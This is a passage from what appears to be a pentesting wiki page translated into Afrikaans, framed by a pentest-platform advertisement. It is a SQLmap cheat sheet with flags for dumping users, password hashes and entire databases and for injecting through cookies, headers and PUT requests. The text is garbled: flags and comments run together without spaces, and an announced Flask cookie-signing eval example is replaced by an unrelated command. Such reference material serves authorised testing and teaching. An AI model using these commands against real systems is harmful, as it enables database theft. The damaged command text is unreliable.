Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & pentest. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap & funksies wat strek vanaf rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporing & uitbuitingsmodules om hulle 'n bietjie tyd terug te gee om dieper te delf, skulpe te laat spat, en pret te hê.
Basiese argumente vir SQLmap
Generies
-u"<URL>"-p"<PARAM TO TEST>"--user-agent=SQLMAP--random-agent--threads=10--risk=3#MAX--level=5#MAX--dbms="<KNOWN DB TECH>"--os="<OS>"--technique="UB"#Use only techniques UNION and BLIND in that order (default "BEUSTQ")--batch#Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers--auth-type="<AUTH>"#HTTP authentication type (Basic, Digest, NTLM or PKI)--auth-cred="<AUTH>"#HTTP authentication credentials (name:password)--proxy=http://127.0.0.1:8080--union-char"GsFRts2"#Help sqlmap identify union SQLi techniques with a weird union char
Kry Inligting
Intern
--current-user#Get current user--is-dba#Check if current user is Admin--hostname#Get hostname--users#Get usernames od DB--passwords#Get passwords of users in DB--privileges#Get privileges
DB data
DB data
--all#Retrieve everything--dump#Dump DBMS database table entries--dbs#Names of the available databases--tables#Tables of a database ( -D <DB NAME> )--columns#Columns of a table ( -D <DB NAME> -T <TABLE NAME> )-D<DBNAME>-T<TABLENAME>-C<COLUMNNAME>#Dump column
#Inside cookiesqlmap-u"http://example.com"--cookie"mycookies=*"#Inside some headersqlmap-u"http://example.com"--headers="x-forwarded-for:127.0.0.1*"sqlmap-u"http://example.com"--headers="referer:*"#PUT Methodsqlmap--method=PUT-u"http://example.com"--headers="referer:*"#The injection is located at the '*'
Dui string aan wanneer inspuiting suksesvol is
--string="string_showed_when_TRUE"
Eval
Sqlmap maak die gebruik van -e of --eval moontlik om elke lading te verwerk voordat dit met 'n paar python-oneliners gestuur word. Dit maak dit baie maklik en vinnig om die lading op aangepaste maniere te verwerk voordat dit gestuur word. In die volgende voorbeeld word die flask koekie-sessiedeur flask onderteken met die bekende geheim voordat dit gestuur word:
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap-rr.txt-pid--not-stringridiculous--batch
Tamper
Onthou dat jy jou eie tamper in Python kan skep en dit is baie eenvoudig. Jy kan 'n tamper-voorbeeld vind op die Tweede Orde Inspruiting bladsy hier.
--tamper=name_of_the_tamper#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & pentest. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & kenmerke wat vanaf rekognisering tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporing & uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te delf, doppe te skiet, en pret te hê.